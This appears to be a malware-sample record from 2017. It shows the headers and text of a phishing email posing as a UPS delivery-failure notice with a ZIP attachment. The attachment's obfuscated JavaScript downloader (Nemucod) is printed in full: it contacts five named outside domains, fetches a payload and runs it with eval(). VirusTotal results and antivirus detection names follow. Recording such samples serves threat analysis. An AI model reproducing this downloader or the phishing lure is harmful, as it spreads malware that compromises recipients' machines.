- Received: from exim by mail3.eqx.gridhost.co.uk with spam-scanned (Exim 4.63)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM2-0008LB-OV
- for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:23 +0000
- X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
- spam-10-168-100-9.eqx.gridhost.co.uk
- X-Spam-Level: **
- X-Spam-Status: No, score=2.7 required=4.0 tests=BAYES_50,RCVD_IN_BRBL_LASTEXT,
- RDNS_NONE autolearn=no version=3.3.1
- X-Spam-RelaysUntrusted: [ ip=46.248.165.161 rdns= helo=www.e-conrad.iq.pl
- by=mail3.eqx.gridhost.co.uk ident= envfrom=presta@www.e-conrad.iq.pl intl=0
- id=1cjhM2-0008Jw-MY auth= msa=0 ]
- Received: from [46.248.165.161] (helo=www.e-conrad.iq.pl)
- by mail3.eqx.gridhost.co.uk with esmtps (TLSv1:AES256-SHA:256)
- (Exim 4.63)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM2-0008Jw-MY
- for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:18 +0000
- Received: from presta by www.e-conrad.iq.pl with local (Exim 4.80.1)
- (envelope-from <presta@www.e-conrad.iq.pl>)
- id 1cjhM1-0006mu-Mc
- for info@haymarketdental.com; Fri, 03 Mar 2017 08:10:17 +0100
- To: info@haymarketdental.com
- Subject: We have delivery problems with your parcel #004264707
- X-PHP-Originating-Script: 1008:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
- Date: Fri, 3 Mar 2017 08:10:17 +0100
- Content-Type: multipart/mixed;
- boundary="bound1_9f49d9393cb5a33697a5f25c631fad12"
- Content-Transfer-Encoding: 8bit
- Message-Id: <E1cjhM1-0006mu-Mc@www.e-conrad.iq.pl>
- From: presta@www.e-conrad.iq.pl
- --bound1_9f49d9393cb5a33697a5f25c631fad12
- Content-Type: text/plain; charset=us-ascii
- Dear Customer,
- Your item has arrived at the UPS Post Office at March 01, but the courier was unable to deliver parcel to you.
- Please review delivery label in attachment!
- Most sincerely,
- Keith Levy,
- UPS Delivery Agent.
- --bound1_9f49d9393cb5a33697a5f25c631fad12
- Content-Type: application/zip; name="UPS-Delivery-004264707.zip"
- Content-Transfer-Encoding: base64
- Content-Disposition: attachment; filename=UPS-Delivery-004264707.zip
- --bound1_9f49d9393cb5a33697a5f25c631fad12--
- function mesuto() {
- for (var i=0; i<x.length; i++)
- {
- var vDJmB = function(){
- return new ActiveXObject(g2);
- }();
- var e = vDJmB;
- try
- {
- var raspbna2s=["\x6F"+pi6dnz];
- e[raspbna2s[9-9+0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+ter+"c"+"o"+"u"+"n"+"ter/?"+m,false);
- e.send();
- var r = e.responseText;
- if (r.length > 999+1 && r.indexOf(m) > -1)
- {
- reqty(e.responseText.split(m).join('a'));
- break;
- };
- }
- catch(e)
- {
- };
- };
- }
- var g2 = "Msxml2.XMLHTTP";
- var m = "TWwE8ZBQhl9uXU1h6TcaHDu7BA_vx6h4f-73rI1oXapZYv36uqMPzG0XhQf-Cx7VlZ3Mn-wTcskPW6RXWHM";
- var x = new Array("jeannetaylordds.com", "wholesalehotelsuites.com", "lovingfloridalife.com", "jleaf.se", "iveybusiness.vmnow.co");
- function reqty(fdga) { eval(fdga); }
- var t4 = "http";
- var pi6dnz = "\x70\x65\x6E";
- var ter = "/";
- mesuto();
- https://www.virustotal.com/en/file/ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10/analysis/1488824666/
- File identification
- MD5 ec699c50bd7aefcdd86cbd955f001985
- SHA1 5dc9fcd6b739835f226018b506d0647a93d83482
- SHA256 ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10
- ssdeep
- File size 840 bytes ( 840 bytes )
- File type unknown
- Magic literal
- TrID
- VirusTotal metadata
- First submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
- Last submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
- File names UPS-Delivery-004264707.zip
- Contained files
- This file is a compressed stream containing 1 file.
- [+] UPS-Delivery-004264707.doc.zip ZIP 718 Bytes
- Compression metadata
- Contained files 1
- Uncompressed size 718
- Highest datetime 2017-03-03 08:10:16
- Lowest datetime 2017-03-03 08:10:16
- Contained files by extension
- zip 1
- Contained files by type
- ZIP 1
- ExifTool file metadata
- MIMEType application/zip
- ZipRequiredVersion 20
- ZipCRC 0xb00050e4
- FileType ZIP
- ZipCompression Deflated
- ZipUncompressedSize 718
- ZipCompressedSize 682
- FileTypeExtension zip
- ZipFileName UPS-Delivery-004264707.doc.zip
- ZipBitFlag 0
- ZipModifyDate 2017:03:03 08:10:08
- Microsoft TrojanDownloader:JS/Nemucod.ZZZ 20170306
- NANO-Antivirus Trojan.Script.Nemucod.embvil 20170306
- Kaspersky Trojan-Downloader.JS.Agent.nrs 20170306
- ZoneAlarm by Check Point Trojan-Downloader.JS.Agent.nrs 20170306
- K7AntiVirus Trojan ( 004dfe6d1 ) 20170306
- K7GW Trojan ( 004dfe6d1 ) 20170306
- TrendMicro TROJ_NEMUZIP.SMA1 20170306
- TrendMicro-HouseCall TROJ_NEMUZIP.SMA1 20170306
- Sophos Mal/DrodZp-A 20170306
- Emsisoft JS:Trojan.JS.Agent.PLM (B) 20170306
- ALYac JS:Trojan.JS.Agent.PLM 20170306
- Ad-Aware JS:Trojan.JS.Agent.PLM 20170306
- Arcabit JS:Trojan.JS.Agent.PLM 20170306
- BitDefender JS:Trojan.JS.Agent.PLM 20170306
- F-Secure JS:Trojan.JS.Agent.PLM 20170306
- GData JS:Trojan.JS.Agent.PLM 20170306
- eScan JS:Trojan.JS.Agent.PLM 20170306
- ESET-NOD32 JS/TrojanDownloader.Nemucod.CKJ 20170306
- McAfee JS/Nemucod.rj 20170306
- McAfee-GW-Edition JS/Nemucod.rj 20170306
- Fortinet JS/Nemucod.CKJ!tr.dldr 20170306
- AVG JS/Downloader.Agent.70_S 20170306
- Cyren JS/Downldr.HX1!Eldorado 20170306
- F-Prot JS/Downldr.HX1!Eldorado 20170306
- Baidu JS.Trojan-Downloader.Nemucod.ud 20170306
- CAT-QuickHeal JS.Nemucod.CIS 20170306
- DrWeb JS.DownLoader.1225 20170306
- Comodo Heur.Dual.Extensions 20170306